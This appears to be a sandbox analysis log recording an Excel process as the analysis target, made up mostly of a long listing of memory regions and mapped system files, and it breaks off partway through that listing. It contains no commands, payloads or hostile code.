# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 30.08.2018 14:38:15.461 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files\\microsoft office\\office15\\excel.exe" page_root = "0x3a59d000" os_pid = "0x9ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE\"" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 135 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 138 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 139 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 140 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 141 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 142 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 143 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 144 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 145 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 146 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 147 start_va = 0x230000 end_va = 0x236fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 148 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 149 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 150 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 151 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 152 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 153 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 154 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 155 start_va = 0x2e0000 end_va = 0x2e4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 156 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 157 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 158 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 159 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 160 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 161 start_va = 0x1c10000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 162 start_va = 0x1d10000 end_va = 0x1d10fff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 163 start_va = 0x1d20000 end_va = 0x1d20fff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 164 start_va = 0x1d30000 end_va = 0x1d30fff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 165 start_va = 0x1d40000 end_va = 0x1d40fff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 166 start_va = 0x1d50000 end_va = 0x1d50fff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 167 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 168 start_va = 0x1d70000 end_va = 0x1d71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 169 start_va = 0x1d80000 end_va = 0x1d80fff entry_point = 0x1d80000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 170 start_va = 0x1d90000 end_va = 0x1dacfff entry_point = 0x1d90000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 171 start_va = 0x1db0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 172 start_va = 0x1dc0000 end_va = 0x1e9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dc0000" filename = "" Region: id = 173 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 174 start_va = 0x1eb0000 end_va = 0x1ec1fff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 175 start_va = 0x1ed0000 end_va = 0x1ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 176 start_va = 0x1ee0000 end_va = 0x1ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 177 start_va = 0x1ef0000 end_va = 0x1ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 178 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 179 start_va = 0x1f80000 end_va = 0x1f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 180 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 181 start_va = 0x1fa0000 end_va = 0x1fa0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 182 start_va = 0x1fb0000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 183 start_va = 0x2030000 end_va = 0x2042fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 184 start_va = 0x2050000 end_va = 0x2067fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 185 start_va = 0x2070000 end_va = 0x208efff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 186 start_va = 0x2090000 end_va = 0x209cfff entry_point = 0x2090000 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui") Region: id = 187 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 188 start_va = 0x20b0000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 189 start_va = 0x21b0000 end_va = 0x222efff entry_point = 0x21b0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 190 start_va = 0x2230000 end_va = 0x2240fff entry_point = 0x2230000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 191 start_va = 0x2250000 end_va = 0x2251fff entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 192 start_va = 0x2260000 end_va = 0x2260fff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 193 start_va = 0x2270000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 194 start_va = 0x2370000 end_va = 0x263efff entry_point = 0x2370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 195 start_va = 0x2640000 end_va = 0x2a29fff entry_point = 0x2640000 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\xlintl32.dll") Region: id = 196 start_va = 0x2a30000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 197 start_va = 0x2b30000 end_va = 0x2b4efff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 198 start_va = 0x2b50000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 199 start_va = 0x2c50000 end_va = 0x3042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c50000" filename = "" Region: id = 200 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 201 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 202 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 203 start_va = 0x3080000 end_va = 0x3081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003080000" filename = "" Region: id = 204 start_va = 0x3090000 end_va = 0x30aefff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 205 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 206 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 207 start_va = 0x30d0000 end_va = 0x30e6fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 208 start_va = 0x30f0000 end_va = 0x30f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 209 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 210 start_va = 0x3110000 end_va = 0x3124fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 211 start_va = 0x3130000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 212 start_va = 0x3140000 end_va = 0x3155fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 213 start_va = 0x3160000 end_va = 0x3163fff entry_point = 0x3160000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 214 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 215 start_va = 0x3180000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 216 start_va = 0x3280000 end_va = 0x32e3fff entry_point = 0x3280000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 217 start_va = 0x32f0000 end_va = 0x3308fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 218 start_va = 0x3310000 end_va = 0x3321fff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 219 start_va = 0x3330000 end_va = 0x3346fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 220 start_va = 0x3350000 end_va = 0x3352fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 221 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 222 start_va = 0x3370000 end_va = 0x346ffff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 223 start_va = 0x3470000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 224 start_va = 0x3570000 end_va = 0x3572fff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 225 start_va = 0x3580000 end_va = 0x3582fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 226 start_va = 0x3590000 end_va = 0x3592fff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 227 start_va = 0x35a0000 end_va = 0x35affff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 228 start_va = 0x35b0000 end_va = 0x35b0fff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 229 start_va = 0x35c0000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 230 start_va = 0x35d0000 end_va = 0x3dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035d0000" filename = "" Region: id = 231 start_va = 0x3dd0000 end_va = 0x3dd1fff entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 232 start_va = 0x3de0000 end_va = 0x3de0fff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 233 start_va = 0x3df0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 234 start_va = 0x3ef0000 end_va = 0x3f37fff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 235 start_va = 0x3f40000 end_va = 0x3f40fff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 236 start_va = 0x3f50000 end_va = 0x3f50fff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 237 start_va = 0x3f60000 end_va = 0x3f60fff entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 238 start_va = 0x3f70000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 239 start_va = 0x4070000 end_va = 0x412ffff entry_point = 0x4070000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 240 start_va = 0x4130000 end_va = 0x4130fff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 241 start_va = 0x4140000 end_va = 0x423ffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 242 start_va = 0x4240000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 243 start_va = 0x4340000 end_va = 0x4340fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 244 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 245 start_va = 0x4360000 end_va = 0x4360fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 246 start_va = 0x4370000 end_va = 0x4370fff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 247 start_va = 0x4380000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 248 start_va = 0x4480000 end_va = 0x487ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004480000" filename = "" Region: id = 249 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 250 start_va = 0x4980000 end_va = 0x4980fff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 251 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 252 start_va = 0x49a0000 end_va = 0x49a0fff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 253 start_va = 0x49b0000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 254 start_va = 0x4a30000 end_va = 0x535ffff entry_point = 0x4a30000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 255 start_va = 0x5360000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 256 start_va = 0x5560000 end_va = 0x565ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 257 start_va = 0x5660000 end_va = 0x56f7fff entry_point = 0x5660000 region_type = mapped_file name = "segoeuisl.ttf" filename = "\\Windows\\Fonts\\SEGOEUISL.TTF" (normalized: "c:\\windows\\fonts\\segoeuisl.ttf") Region: id = 258 start_va = 0x5700000 end_va = 0x577ffff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 259 start_va = 0x5780000 end_va = 0x57c7fff entry_point = 0x0 region_type = private name = "private_0x0000000005780000" filename = "" Region: id = 260 start_va = 0x57d0000 end_va = 0x57d0fff entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 261 start_va = 0x57e0000 end_va = 0x5bdffff entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 262 start_va = 0x5be0000 end_va = 0x5c0ffff entry_point = 0x5be0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 263 start_va = 0x5c10000 end_va = 0x5c13fff entry_point = 0x5c10000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 264 start_va = 0x5c20000 end_va = 0x5c21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c20000" filename = "" Region: id = 265 start_va = 0x5c30000 end_va = 0x5c31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c30000" filename = "" Region: id = 266 start_va = 0x5c40000 end_va = 0x5c40fff entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 267 start_va = 0x5c50000 end_va = 0x5c50fff entry_point = 0x0 region_type = private name = "private_0x0000000005c50000" filename = "" Region: id = 268 start_va = 0x5c60000 end_va = 0x5d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c60000" filename = "" Region: id = 269 start_va = 0x5d60000 end_va = 0x5dc5fff entry_point = 0x5d60000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 270 start_va = 0x5dd0000 end_va = 0x5ddffff entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 271 start_va = 0x5de0000 end_va = 0x61e0fff entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 272 start_va = 0x61f0000 end_va = 0x65f0fff entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 273 start_va = 0x6600000 end_va = 0x6a00fff entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 274 start_va = 0x6a10000 end_va = 0x6c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 275 start_va = 0x6c10000 end_va = 0x740ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c10000" filename = "" Region: id = 276 start_va = 0x7410000 end_va = 0x78cffff entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 277 start_va = 0x78d0000 end_va = 0x7ccffff entry_point = 0x0 region_type = private name = "private_0x00000000078d0000" filename = "" Region: id = 278 start_va = 0x7cd0000 end_va = 0x84cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007cd0000" filename = "" Region: id = 279 start_va = 0x84d0000 end_va = 0x85cffff entry_point = 0x0 region_type = private name = "private_0x00000000084d0000" filename = "" Region: id = 280 start_va = 0x85d0000 end_va = 0x85d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000085d0000" filename = "" Region: id = 281 start_va = 0x85e0000 end_va = 0x85e3fff entry_point = 0x85e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 282 start_va = 0x85f0000 end_va = 0x85f0fff entry_point = 0x85f0000 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 283 start_va = 0x8600000 end_va = 0x8603fff entry_point = 0x8600000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 284 start_va = 0x8610000 end_va = 0x8610fff entry_point = 0x8610000 region_type = mapped_file name = "{b33c4f4b-938b-4cb1-bc05-f090b0a61a1a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{B33C4F4B-938B-4CB1-BC05-F090B0A61A1A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{b33c4f4b-938b-4cb1-bc05-f090b0a61a1a}.2.ver0x0000000000000001.db") Region: id = 285 start_va = 0x8620000 end_va = 0x8623fff entry_point = 0x8620000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 286 start_va = 0x8630000 end_va = 0x86affff entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 287 start_va = 0x86b0000 end_va = 0x87affff entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 288 start_va = 0x87b0000 end_va = 0x87b0fff entry_point = 0x87b0000 region_type = mapped_file name = "{d299adbb-3c80-401e-9a81-68ee95177a1c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{D299ADBB-3C80-401E-9A81-68EE95177A1C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{d299adbb-3c80-401e-9a81-68ee95177a1c}.2.ver0x0000000000000001.db") Region: id = 289 start_va = 0x87c0000 end_va = 0x87c0fff entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 290 start_va = 0x87d0000 end_va = 0x87d0fff entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 291 start_va = 0x87e0000 end_va = 0x87e0fff entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 292 start_va = 0x87f0000 end_va = 0x87f7fff entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 293 start_va = 0x8890000 end_va = 0x890ffff entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 294 start_va = 0x8910000 end_va = 0x8d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000008910000" filename = "" Region: id = 295 start_va = 0x8d20000 end_va = 0x8e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000008d20000" filename = "" Region: id = 296 start_va = 0x8e40000 end_va = 0x8f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008e40000" filename = "" Region: id = 297 start_va = 0x8fa0000 end_va = 0x909ffff entry_point = 0x0 region_type = private name = "private_0x0000000008fa0000" filename = "" Region: id = 298 start_va = 0x90d0000 end_va = 0x91cffff entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 299 start_va = 0x91f0000 end_va = 0x92effff entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 300 start_va = 0x9390000 end_va = 0x948ffff entry_point = 0x0 region_type = private name = "private_0x0000000009390000" filename = "" Region: id = 301 start_va = 0x9490000 end_va = 0x9c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009490000" filename = "" Region: id = 302 start_va = 0x9c90000 end_va = 0x9d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c90000" filename = "" Region: id = 303 start_va = 0x9e50000 end_va = 0x9e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 304 start_va = 0x9ee0000 end_va = 0x9fdffff entry_point = 0x0 region_type = private name = "private_0x0000000009ee0000" filename = "" Region: id = 305 start_va = 0xa0b0000 end_va = 0xa12ffff entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 306 start_va = 0xa1f0000 end_va = 0xa2effff entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 307 start_va = 0xa310000 end_va = 0xa40ffff entry_point = 0x0 region_type = private name = "private_0x000000000a310000" filename = "" Region: id = 308 start_va = 0xa4c0000 end_va = 0xa5bffff entry_point = 0x0 region_type = private name = "private_0x000000000a4c0000" filename = "" Region: id = 309 start_va = 0x37a50000 end_va = 0x37a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000037a50000" filename = "" Region: id = 310 start_va = 0x74360000 end_va = 0x743f7fff entry_point = 0x74360000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 311 start_va = 0x74400000 end_va = 0x744d1fff entry_point = 0x74400000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 312 start_va = 0x754c0000 end_va = 0x754f2fff entry_point = 0x754c0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 313 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 